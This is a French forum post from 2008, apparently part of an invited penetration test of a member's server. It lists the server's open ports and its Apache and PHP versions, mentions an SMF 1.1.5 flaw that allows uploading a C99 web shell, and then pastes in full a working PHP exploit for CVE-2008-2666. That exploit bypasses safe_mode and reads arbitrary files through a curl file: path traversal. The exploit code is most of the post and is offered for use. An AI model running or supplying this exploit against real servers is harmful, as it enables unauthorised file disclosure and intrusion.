by Korigan » Thu Aug 28, 2008 2:35 pm
Oyé oyé.
Bon, je reviens du front là et il y a peut etre une piste.
Donc SMF 1.1.5 contient effectivement des failles dont une permettant l'upload de C99. Il y a dailleur un super tuto sur le net qui explique pas à pas comment faire. :/
Par ailleur, un scan de ta machine montre les port d'apache et de mysql ouvert.
Toute tentative de connection sur le port mysql est veine, il ne semble pas accepter les ip extérieure à ton réseau, ce qui est une bonne chose ^^
Pour ce qui est d'apache, sa version serait 2.2.8 (Win32) et PHP 5.2.6
Donc il existe de nombreuse faille pour Apache 2.2.x mais 2.2.8 était une version conseillé, à voir si c'est suffisant ^^
Cf: http://www.saintcorporation.com/cgi-bin/demo_tut.pl?tutorial_name=Apache_vulnerabilities.html&fact_color=&tag=
Avec un phpinfo() tu sera à même de voir directement par toi même si tu utilises l'un des modules faillible. Sinon il faudra les tester ^^
Si quelqu'un veux s'occuper de PHP 5.2.6 pendant ce temps cela nous ferait gagner du temps.
Bon biensur SMF semble vulnérable au flood et autre DoS, je ne vois aucun captcha ou protection particulière d'installé. Mais je ne pense pas qu'en postant ici ce soit le genre de faille que tu veule que l'on trouve ^^
Bref...affaire à suivre et merci pour le compte de test, sans lui j'aurais attendu kk heures de plus ^^
Voici un exploit pour PHP 5.2.6, pas encore testé, mais faut voir...
[code:1:4612ae874e]
<?php
/*
Exploit for CVE-2008-2666:
http://securityreason.com/achievement_securityalert/55
Orginal URL
http://securityreason.com/achievement_exploitalert/10
safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://securityreason.com
cxib [at] securityreason [dot] com
How to fix?
Do not use safe_mode as a main safety
*/
eCHo "<PRE><P>This is exploit from <a
href=\"http://securityreason.com\">http://securityreason.com</a>
Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode
bypass<p>More: <a
href=\"http://securityreason.com/news/0/0x24\">http://securityreason.com/ne
ws/0/0x24</a><p><form name=\"form\"
action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\"
value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\"
value=\"Show\"></form>\n";
if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this
requirement
if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http:
directory</b>");
mkDIR("http:");
}
if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file']))
diE("\n".$karatonik);
if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];
if((curl_exec(curl_init("file:http://../../../../../../../../../../../../..
/../../../../../../../../../../../../../../../../../../../../".$file))) aNd
!emptY($file)) die("<B><br>best regards cxib from
securityreason.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have
permissions.</CENTER></FONT>");
?>
[/code:1:4612ae874e]